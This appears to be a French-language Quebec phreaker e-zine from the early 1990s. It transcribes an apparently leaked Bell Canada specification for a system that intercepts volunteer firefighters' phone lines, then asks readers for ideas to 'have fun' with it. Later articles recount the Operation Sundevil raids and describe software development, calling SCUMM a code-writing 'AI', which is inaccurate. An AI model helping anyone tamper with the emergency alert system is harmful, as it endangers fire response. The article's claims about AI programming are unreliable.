de retranscription. Merci! Et, en passant, nous ne corrigerons pas toutes
les fautes de franais dans vos documents. Alors, si vous voulez avoir
l'air un peu moins twits, corrigez-les avant de les jeter...
Bon, ceci pos, nous avons donc dcouvert,
dfaut du nouveau systme
911, un petit quelque chose que le Bell concocte pour les cas d'urgence.
Si vous tes un phreaker digne de ce nom, cette information ne sera pas
sans vous intresser... Nous sommes tous curieux de connatre le
fonctionnement de Bell dans ses moindres dtails, non?
OK... Prenons le projet suivant:
POMPIERS VOLONTAIRES
DEVIS RELATIF A UNE DEMANDE DE FOURNITURE D'UN
SYSTEME D'APPEL TELEPHONIQUE DE POMPIERS
VOLONTAIRES DESTINE AUX PETITES ET MOYENNES
MUNICIPALITS
1- HISTORIQUE
Bell canada offre depuis une vingtaine d'annes un service d'appels aux
pompiers volontaires destin aux petites municipalits du milieu rural.
Ce systme permet d'intercepter la ligne prive des pompiers volontaires
et d'y appliquer une sonnerie spciale et facilement identifiable.
Lorsque les pompiers rpondent, le prpos peut communiquer directement
avec eux
l'aide du combin de la console.
Au dbut, Bell contrlait assez bien le nombre d'appareils tlphoniques
installs chez ses abonns, ce qui n'est plus le cas aujourd'hui. De
plus, les municipalits ont vu leur population grandir et ont donc d
accrotre le nombre de leurs pompiers volontaires.
Mme que dans certains cas, le cot maintenant exorbitant d'une escouade
de pompiers permanents, a forc plusieurs grandes municipalits
lui
joindre un groupe de pompiers volontaires parfois imposant.
Tous ces facteurs, plus prenant en compte la dsutude du systme
existant, nous conduit
regarder la possibilit d'en construire un
autre, mieux adapt aux besoins de notre temps.
Un systme qui utilisant une technologie moderne, sera plus fiable et
donc scurisant pour tout le monde.
2-DESCRIPTION DES COMPOSANTES
Le systme se divise en trois parties:
1) La console de contrle quipe d'un combin VLN, qui est installe
chez le client.
2) Les ponts de confrences installs dans le central tlphonique.
3) Les circuits de contrle (dcodeur de tonalits, circuits
d'interception et de sonnerie)
Une description dtaille de l'opration de ces trois lments, est
prcise aux pages suivantes de ce document.
2.1- LA CONSOLE
La console devra avoir une allure moderne et tre rsistante. Ses boutons
de contrle devront tre de bonne qualit et quips d'un (LED pourpre).
Ce "LED", lors d'un appel initi en poussant le bouton sur lequel il est
mont, devra clignoter tant et aussi longtemps que le pompier rattach au
dit bouton n'aura pas rpondu. Subsquemment lorsqu'il aura rpondu, le
"LED" s'illuminera en permanence. Ainsi le prpos pourra facilement
garder la liste des appels tlphoniques des pompiers qui ont t
dcrochs pour rpondre
l'appel. Un bouton de relchement permettra de
rgnrer le systme jusqu'
la prochaine intervention. Tous les LED's
seront alors teints
l'exception de celui qui tmoigne de la
disponibilit de la console. Il s'agit ici de la seule opration qui
permette d'teindre les LED's. Autrement dit, la condition des appels
rpondus et non rpondus devra demeurer tant et aussi longtemps que ce
bouton n'aura pas t pouss. S'il n'y a pas de contrainte technique pour
le nombre de pompiers possibles, il y aura cinquante boutons pour
cinquante pompiers. Si non, il y aura autant de boutons que le nombre
maximum de pompiers.
Cinq boutons additionnels permettront de regrouper chacun, dix pompiers
reprsents a la console pour un total de cinquante pompiers. (toujours
si aucune contrainte technique n'existe quand au nombre.). L'association
des dix pompiers
chacun des cinq boutons d,appel par groupe, devra tre
facilement programmable par le prpose du client. Il pourra ainsi
s'organiser lui-mme, chacun de ses cinq groupes de pompiers volontaires.
Afin de fournir un compte-rendu des appels par groupes, les appels par
groupes gnreront la mme opration des LED's sur chacun des boutons
associs
chacun des pompiers. (appels rpondus et non rpondus)
Un bouton d'appel gnral devra aussi tre prvu. Celui-ci permettra
d'appeler tous les pompiers rattachs
la console sur la simple pression
de ce bouton. Les LED's de chacun des pompiers donneront l
aussi, le
compte-rendu des appels rpondus.
La console sera quipe d'un combin de type VLN (combin pour durs
d'oreille).
2.2- LES PONTS DE CONFRENCE
Les ponts de confrences devront tre contrls afin de ne permettre
aucune perte rsultante totale
leur sortie, suprieure a -15 dbm. (ref
600 Ohms .001 A) i.e. si la puissance d'entre au pont est de -4 db, la
perte totale gnre par le pont sera gale ou infrieure
11 db.
Si la dcision est prise d'utiliser un contrle de direction par
dtection de la voix, il faut s'assurer de donner la priorit
la
console. Autrement, si le niveau de bruit chez un pompier volontaire
s'avrait lev, le systme deviendrait inutilisable.
Les ponts et leur circuiterie adjacente, seront monts sur des circuits
enfichables de type utilis couramment dans les bureaux centraux de Bell
Canada.
2.3- LES INTERFACES DE CONTRþLE
Les interfaces de contrle devront tre montes sur des cartes de type
enfichables utilises couramment dans les centraux de Bell Canada.
Elles devront tenir compte du concept (CNCA) (carrier non-compatible
application) dont la fourniture ne sera plus garantie aprs le 30 avril
1993. Donc il ne faut compter sur aucun lien mtallique de bout en bout.
IL FAUT QUE TOUS LES SIGNAUX UTILISES PAR LE SYSTEME, SOIENT "CARRIER
COMPATIBLE".
Ces interfaces pourront puiser
mme l'alimentation d'urgence du central
(-48v et 110v 20 hertz) Le -48v tant seulement prfiltr pour les
besoins de la tlphonie, un rgulateur intgr aux systme devra tre
prvu dans le circuit d'alimentation de celui-ci.
Ces interfaces devront permettre l'opration de la console, tel que
dcrit au paragraphe traitant de LA CONSOLE.
Elles auront
transfrer la ligne de l'abonn vers le systme de pompier
volontaire.
Deux cas sont alors possibles:
a) LA LIGNE DU POMPIER EST RACCROCHE.
L'interface transfert la ligne de l'abonn vers le systme de pompiers et
la branche sur la sonnerie du central. Cette sonnerie ne doit pas tre
entendue par la console afin de permettre la diffusion du message aux
pompiers qui ont dj
rpondu. Lorsque le pompier rpond
sa ligne, il
doit tre automatiquement branch sur le port de confrence de faon
ce
qu'il puisse lui aussi recevoir le message d'incendie.
b) LA LIGNE DU POMPIER EST DCROCHE.
L'interface met une tonalit forte sur la ligne du pompier volontaire et
15 secondes plus tard, transfert la ligne automatiquement sur le pont de
confrence des pompiers volontaires.
OPTIONNEL
Le pompier peut empcher le transfert de sa ligne au systme de pompiers
volontaires, en appuyant sur la touche "5" de son clavier "touch tone" en
dea du 1 secondes. (option utile si une autre personne utilise le
tlphone personnel du pompier et que celui-ci n'est pas
la maison.)
le pompier peut empcher le transfert de sa ligne au systme de pompiers
volontaires, en donnant une impulsion sur le crochet du commutateur.
(link ou flash hook)
POMPIERS DISTANTS
Le systme devra prvoir, la possibilit d'inclure des pompiers qui ne
sont pas desservis par le mme central tlphonique que la console.
2.4- POINT DE SCURIT
Il est de plus trs important qu'une forme de dialogue s'tablisse
priodiquement entre la console et les cartes de contrle. Cela de faon
vrifier la continuit du service du circuit tlphonique. Afin
d'assurer une relve en cas de panne du dit circuit, les cartes devront
pouvoir s'accommoder d'une autre ligne tlphonique comme circuit
alternatif. Le transfert d'utilisation de circuit devra tre assur par
la carte ou les cartes de contrle.
3- CARACTRISTIQUES
Ce nouvel quipement devra remplacer adquatement le systme existant, en
tenant compte des contraintes et des disponibilits techniques modernes.
La fourniture des diffrentes pices devra tre garantie pour une priode
suprieure
dix annes. Durant cette priode de temps, il est entendu
que Bell Canada s'attend
ce qu'un support technique complet et efficace
soit disponible rapidement. Si des sous-contrats sont accords pour
assurer la fabrication de diffrentes pices d'quipement, il deviendra
la responsabilit du soumissionnaire d'en assurer l'approvisionnement et
la qualit.
Des dlais de livraison raisonnables devront tre spcifis tant pour le
nouvel quipement que pour les pices de secours commandes
subsquemment.
La compagnie Bell Canada, s'approprie l'exclusivit du concept et devra
contrler elle-mme le partage de celui-ci avec les autres compagnies
tlphoniques. Le fournisseur s'engage donc,
aviser Bell canada de
toutes les demandes relatives au produit en provenance d'autres
compagnies.
La compagnie Bell Canada, se rserve en tout temps le droit de faire
fabriquer le produit par d'autres fournisseurs si elle le juge
ncessaire. Donc, aucun droit particulier ne sera accord tant qua la
fourniture de celui-ci.
(Fin de la transcription...)
Je vous pargne le reste des conneries contenues dans ce document...
J'espre que le bout o "Bell s'approprie l'exclusivit" vous a fait rire
autant que moi...
De quelle manire pourrait-on s'amuser avec ce nouveau joujou? J'attends
vos suggestions...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
UTILISEZ BELL, Y'A PAS LE FEU!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-+( ThE CYbErPuNk BuSt )+-
Part I
Writer: l0gRuS!
On nous accuse, nous officiers et collabos de NpC, de ne montrer
que les beaux et roses cts du Hack/Phreak...
Ah ouin?
01/03/90, Austin (Texas). Erik Bloodaxe (handle) est rveill par
un revolver de police point vers sa tte. Bloodaxe tait CSO du
Phoenix Project ([512] Tx) et un membre avou de Legion of Doom
(LoD)...
L'un des busts les plus publiciss et controverss de l'histoire du
hack s'tait mis en branle, Opration SunDevil, le CyberPunk Bust.
Pourquoi CyberPunk? You'll see..
Bloodaxe (les hackers ne sont pas cons, c'est bien connu) avait
auparavant cach son meilleur quipement ailleurs. Les agents des
Secret Services amricains (USSS, ou SS) sont donc repartis avec un
terminal 300 Bauds, le code-source du Worm Internet de R.Morris, son
tlphone, et tout ce qu'il y avait d'lectronique dans la maison. Ils se
sont mme essays pour le Pac-Man en version Arcade mais il tait trop
lourd, alors..
Meanwhile...
Six agents des SS, un flic d'Austin et Henry Kluepfel (Who the
fuck is he? Tout ce que je sais, c'est que ce mec est
responsable d'un bon pourcentage des busts et des raids de pirates
aux States. Le genre qu'on voudrait pas voir
Qubec quoi..)
pntrent dans la chambre
coucher de The Mentor, les surprenant
lui et sa femme en sous-vtements. The Mentor n'tait vraiment pas
prt au bust (Errare Humanum Est).. Sont alls dans les poches de
l'tat:
Un IBM AT clone avec 4Mgs RAM et un HD de 120Mgs.
Une Imprimante Laserjet ][.
Un Systme d'exploitation SCO-XENIX 286, tout
fait lgitime.
Des disks de PageMaker et Microsoft Word
La thse d'Universit de la blonde de Mentor.
Le tlphone familial, etc..
La 3me Phase du CyberPunk se prparait, la finale quoi.. Mais
avant, qui tait donc ce Mentor?
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Nom: Unknown
Handle: The Mentor Age:????
Organisations: LoD, Phrack [Writer] Status: Mari
SysOp de: -Phoenix Project
-Illuminati Bbs [412] 447-4449
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Mmmm.. On sait
propos de Phoenix Project mais.. Qu'est donc ce
Illuminati Bbs?
The Mentor tait diteur en chef et concepteur de jeu
la
compagnie Steve Jackson Games (SJG). Oui oui, le mme Steve Jackson
qui vous
fait tripper avec ses "Livres-dont-vous-tes-le-Hros"
qnand vous tiez mmes. Ce mme Steve Jackson s'est plus tard parti
une compagnie de Jeux de Rles (Eh oui! Encore!), ayant comme
produit principal GURPS (Generic Universal Role-Playing System). Le
but de GURPS tait de crer un jeu de rle polyvalent, o on
pourrait par la suite y greffer tous les mondes et toutes les
poques possibles et inimaginables...
Il y eu donc GURPS Fantasy, pour jouer
l'poque des chevaliers,
GURPS Special Ops, pour aller dans la peau de votre espion favori,
GURPS Space, pour voyager aux confins de l'univers..
Puis il y a eu GURPS Illuminati. Le monde de Jeu Illuminati tait
un monde paranoiaque, ou les joueurs dirigeaient de sombres
organisations convoitant la domination de la plante. Illuminati
donnait aux joueurs le pouvoir sur le CIA, le KGB, le Ku Klux Klan,
les Scouts, la compagnie de tlphone.. En gros Illuminati tait la
plus grosse entreprise jamais conue, dans un territoire jamais
explor...
Bien vite, Illuminati dteignit sur la compagnie au complet, et on
voyait des pyramides munies d'un oeil suivant les signatures des
crivains, le mme symbole nigmatique au sommet des rapports de
nouveaux produits, et un peu partout dans leur magazine RolePlayer.
SJG s'tait donc imbib de cette athmosphre de mystre. Il tait
donc normal que, quand on prit la dcision d'ouvrir un Bbs
la
compagnie, pour rpondre aux questions des joueurs et pour animer
des discussions sur le sujet, Illuminati Bbs fut adopt comme nom.
Et qui fut le 1er (et le plus qualifi)
s'offrir comme SO? The
Mentor..
Naturellement, rien d'illgal ne se passait sur Illuminati. Mme
pas une copie de Phrack, meme pas un NpC (Ha!), rien. Quelques
membres de LoD s'y retrouvaient, a oui, mais c'tait uniquement
pour parler de leurs intrts Jeux-De-Rolesques, et rien d'autre..
Mais, me direz-vous, que vient faire ce Bbs dans toute
l'histoire???
Trs simple: Il servira d'alibi pour le bust de Steve Jackson
Games. Mais revenons
notre histoire, justement...
Les agents des SS se prparaient
dfoncer la porte du modeste
building de SJG lorsque Mentor leur offrit la clef, sachant qu'il
est inutile de scrapper une porte pour rien. Les agents ont pn-
tr dans l'immeuble, alors que personne encore n'tait arriv au
boulot, et sont repartis avec trois ordinateurs, plusieurs HD, deux
moniteurs, trois modems, une imprimante laser, tous les fichiers,
E-Mail et T-files du Illuminati Bbs et le manuscrit du Supplment
GURPS CyberPunk.
GURPS CyberPunk.. Le dernier n de la compagnie. Un monde de jeu
pour GURPS se situant dans les environs des annes 2050, un monde
"High Tech, Low Life" domin par l'anarchie, les gangs, et le
piratage informatique (Lire les autres article de l0gRuS!
ce
sujet)... Ce supplment a t crit par The Mentor, afin d'offrir
un univers dcent aux autres hackers, qui pourrait y jouer sans
s'touffer de rire (Comme avec bon nombre de JdR CyberPunks, que je
ne nommerai pas ici).
Lorsque Steve Jackson
t chercher son manuscrit aux bureaux des
SS, avec son avocat, on lui
rpliqu que GURPS CyberPunk tait un
"Manuel au crime par ordinateur"... Steve Jackson
rpliqu:
-" Mais ce n'est que de la Science-Fiction! "
Et vous savez ce que plusieurs agents des SS lui ont rpondu???
-" Non, c'est la ralit... "
Mmmm.. Le genre de phrase qui laisse
rflchir, non? Surtout
lorsque durant le bust:
-Personne n'a t arrt..
-Personne ne fut accus d'aucun crime...
-Aucune poursuite ne fut entame...
-Tout le matriel saisi
t gard comme "preuves" d'un crime
jamais spcifi...
-Le mandat de perquisition n'tait PAS SIGN...
Ah! Je vous vois! Vous vous demandez tous :" Mais qu'y a-t'il
dans ce fameux GURPS CyberPunk??".. Ha! Vous verrez bien dans le
prochain numro, avec la suite de l'histoire du bust de STG! En
attendant, qu'Arioch vous protge de Bell, fellow hackers..
l0gRuS!
Bibliographie:
THE HACKER CRACKDOWN:
LAW AND DISORDER ON THE ELECTRONIC FRONTIER
by Bruce Sterling
Bantam Books, 1992
Non-fiction, 328 pp., $23 (hard-cover)
ISBN 0-553-08058-X
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
POURQUOI TOUT LE MONDE S'EN PREND A NOUS?!?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MAMAN, LES PROGRAMMES POUSSENT-ILS SOUS LES CHOUX?
Anatomie d'un warez
par
Blitzkreig
Mais comment font-ils pour avoir les jeux aussi vite? On parle des
babillards pirates, bien sr, et de la question qu'on nous pose bien
souvent... Une autre question, ternelle litanie du jeune qui dbute,
mais qui a du beat: "C'est quoi un programme beta"? En passant, a fait
combien de temps que la copie beta de DOS 6.0 se promne sur les babs de
Qubec? Quatre mois?
Alors, chers lecteurs, aprs les abeilles et les oiseaux, voici la
petite histoire de la naissance d'un logiciel... Il tait une fois... une
compagnie de soft que nous baptiserons Full-o-Bugz. Un des concepteurs
sous-pays de F.O.B. a soudainement une ide tout
fait originale pour
un soft: un nouveau jeu qu'il a d'ores et dj
baptis "Revenge Of The
Spotted Ninja Lemmings Streetfighters With A Tendency To Overkill". Notre
gnie s'empresse d'aller voir son boss, et aprs la pipe habituelle, lui
soumet son ide. Le reste, c'est, comme on dit, de l'histoire...
Les "oeuvres d'un seul homme", les programmes construits par un seul
programmeur ne sont plus lgion. La race de ces hommes
tout faire
semble s'tre teinte avec le mec (son nom m'chappe) qui avait conu, en
solitaire, le clbre programme OUT OF THIS WORLD. OOTW a d'ailleurs fait
date dans l'histoire des jeux. Vous qui nous lisez, vous avez srement
pouss des "ho!" et des "ha!" devant le mouvement fluide des personnages
et la musique excellente de la trame sonore...
Mais tout a, nous l'avons dit, c'est du pass. Les compagnies ont
maintenant des "teams" de dveloppeurs, quand ils n'ont pas carrment un
AI
leur disposition.
LES A.I.
La plupart des compagnies qui produisent des soft ont, soit un AI, soit
une importante librairie de routines de programmation. Un AI (pour
Artificial Intelligence), c'est en somme un programme (comme le systme
SCUMM de LucasFilm)
qui l'on dicte les paramtres fonctionnels que
notre projet devrait respecter, et qui CRIT ensuite la programmation
dudit projet. Clarifions encore: supposons que je veuille crer un jeu o
le personnage, un pirate informatique, tire sur des employs du Bell qui
arrivent par la droite du tableau, avance ou recule
sa guise, et se
saisit, en se penchant, des PBX bonus pour augmenter sa puissance. Je
raconte tout a au AI, dans les formes, et il va m'crire les routines en
assembleur, ou dans n'importe quel autre langage de mon choix, pour
construire le jeu. Encore un mot sur les AI, puisque je suis sr que la
plupart d'entre vous en entendez parler pour la premire fois... Les
meilleurs AI de l'industrie,
ma connaissance (autres que ceux conus et
produits "in house", SCUMM again) sont sous licence de Texas Instruments.
J'ai rcemment rencontr un reprsentant charg de la vente de ce
produit, qui me racontait que les entreprises sont de plus en plus
intresses par ce machin. Et pour cause: plus besoin d'analystes-
programmeurs. Supposons que le Ministre du Vol du Revenu dsire un
programme pour harceler les contribuables, les tapes a suivre taient
auparavant les suivantes:
1) Les cadres concerns dfinissent ensemble les paramtres de
fonctionnement du programme ("Me semble que le programme devrait nous
permettre de faire ceci, me semble que le programme devrait nous
permettre de faire cela, etc...).
2) Entrait alors en scne l'analyste-programmeur, qui prenait ces
commandes, les instituait en hirarchie logique, et dfinissait les
paramtres de base, pour la programmation en langage-machine.
3) Une quipe de programmeurs utilisait alors le rapport de l'analyste
pour se mettre
la tche et raliser le soft.
Le AI, d'aprs l'expert de Texas Instruments, va pouvoir remplacer le
programmeur-analyste et la majeure partie des programmeurs: chmage,
everyone! L
o a prenait cinq programmeurs pour raliser un soft, un
seul demeurera, pour peaufiner le produit ralis par le AI. Sauf que,
ma connaissance, les AI ne peuvent pas encore dessiner des backgrounds,
lorsqu'il s'agit de jeux... C'est pourquoi les compagnies quipes de
Development Engines (autre nom des AI) font appel
des artistes et
scannent maintenant les dessins ou les rotoscopient, une fois raliss.
On en apprend
tous les jours, hein! Aprs les robots qui fabriquent des
robots, voici des programmes qui fabriquent des programmes...
LES TEAMS
Ceci dit, la plupart des maisons d'dition fonctionnent encore avec une
librairie de routines standard, qui doivent tout de mme tre rvises et
adaptes
chaque nouveau produit. Vous qui vous plaignez que Origin
trane de la patte avec Strike Commander, ne vous plaignez pas trop,
parce que si on met trop de pression, il vont shipper un produit plein de
bugs (dixit Darklands de Microprose) et il va quand mme falloir que vous
courriez aprs les dix ou quinze updates qui vont suivre (Falcon 3.0,
anyone?). Mais pourquoi, alors, commencent-ils
ANNONCER un jeu douze
mois avant qu'il ne soit prt? Ils crent de fausses attentes chez le
consommateur, dites-vous. Pas ncessairement... Il faut comprendre que la
logistique du placement mdia dans un magazine mensuel ou toute autre
forme de publication exige que l'on s'y prenne suffisamment d'avance. Et
les publicistes d'une maison de jeu se basent sur le calendrier de
production du soft pour estimer la date de sortie... Et un calendrier
peut tre souvent mensonger...
ÚÄÄÂÄÄÄÄÄÂÄÄÄÄÂÄÄÄÄÂÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄ¿
³ID³TOTAL³LEFT³DONE³%DONE³TASK DESCRIPTION ³ DUE ³PRED³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³59³12h ³ ³Y ³100% ³Shape draw ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³60³12h ³ ³Y ³100% ³Shape flip ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³61³12h ³ ³Y ³100% ³Shape move ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³62³12h ³ ³Y ³100% ³Shape fill ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³63³12h ³ ³Y ³100% ³Shape shade ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³64³30h ³ ³Y ³100% ³Document editor code ³ 12/6/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³65³18h ³ ³Y ³100% ³Altitude Shift display ³ 8/1/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³66³### ³### ³### ³ 95% ³User interface ³ 8/27/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³67³42h ³ ³Y ³100% ³ Menuing system core ³12/10/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³68³24h ³ ³Y ³100% ³ Menuing revisions ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³69³24h ³ ³Y ³100% ³ Pulldown menu bar ³ 12/5/90³67 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³70³24h ³ ³Y ³100% ³ Area defs for maps/shapes/pal ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³71³12h ³ ³Y ³100% ³ Type data dialog box ³12/13/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³72³12h ³ ³Y ³100% ³ Item data dialog box ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³73³12h ³ ³Y ³100% ³ NPC data dialog box ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³74³12h ³1h ³ ³ 0% ³ Config file ³ 8/27/91³57 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³75³12h ³ ³Y ³100% ³ Spell book dialog box ³ 5/9/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³76³### ³### ³### ³ 0% ³Schedule creator ³ 8/7/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³77³78h ³ ³Y ³100% ³ Schedule entry menu ³12/14/90³ ³
